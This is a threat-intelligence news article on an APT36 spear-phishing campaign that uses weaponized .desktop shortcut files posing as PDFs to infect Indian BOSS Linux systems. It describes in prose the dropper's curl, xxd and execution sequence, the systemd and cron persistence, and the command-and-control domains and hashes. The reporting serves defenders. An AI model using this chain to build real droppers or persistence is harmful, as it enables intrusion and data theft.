APT36 Hackers Attacking Indian BOSS Linux Systems With Weaponized .desktop Shortcut Files

In early August 2025, security researchers uncovered an unprecedented campaign targeting India’s BOSS Linux installations through seemingly innocuous shortcut files.

These files, masquerading as PDF documents, leverage the .desktop format intrinsic to Linux desktop environments to deliver and execute malicious payloads.

Initial access is gained via spear-phishing emails containing a ZIP archive named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip.”

When extracted, this archive presents a file labeled Meeting_Ltr_ID1543ops.pdf.desktop, which, upon execution, silently downloads and deploys an ELF payload tailored for x86-64 systems.

Cyfirma analysts identified that the .desktop shortcut contains an embedded bash command that generates a timestamped temporary file under /tmp, retrieves a hex-encoded payload from a remote server via curl, converts it to binary with xxd, and then assigns execution permissions before launching it in the background.

To maintain the illusion of legitimacy, the script concurrently opens a benign PDF hosted on Google Drive in Firefox, deflecting user suspicion.

This dual-platform strategy allows the threat actor group APT36 to pivot between Windows and Linux environments, targeting government infrastructure with remarkable stealth.

The impact of this campaign is multifaceted: once active, the ELF binary establishes persistence through systemd services and cron jobs, exfiltrates sensitive data to hardcoded command-and-control servers modgovindia.space:4000, and communicates over nonstandard ports using obfuscated DNS queries.

Domain registrations such as securestore.cv and modgovindia.space, created in July 2025, have been flagged as malicious infrastructure supporting the campaign.

The rapid deployment of these domains and the tailored payloads underscores APT36’s evolving sophistication and strategic focus on India’s public sector.

Infection Mechanism

Delving deeper into the infection mechanism reveals a carefully orchestrated sequence of actions designed for both stealth and persistence.

The .desktop file’s Exec line encapsulates a bash command. The hex-encoded file retrieved, Mt_dated_29.txt, is a raw representation of the ELF payload whose MD5 hashes (5bfeeae3cc9386513dc7c301c61e67a7 for the .elf binary) match those found on VirusTotal.

Upon execution, the payload’s ELF header confirms a statically linked 64-bit LSB executable with anomalous section headers likely intended to prevent static analysis.

After code conversion and execution, the payload installs a user-level systemd service named system-update.service and injects a cron entry executing .config/systemd/systemd-update at reboot.

This ensures the malicious binary relaunches without user intervention. Additionally, the malware utilizes nonblocking UDP sockets and epoll for DNS-based C2 communications with modgovindia.space, facilitating both command retrieval and data exfiltration.

The layered approach—from social engineering and obfuscation to persistence and encrypted communications—illustrates APT36’s advanced tradecraft and highlights the need for enhanced Linux-focused email security, application whitelisting, and endpoint monitoring in sensitive government environments.

Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.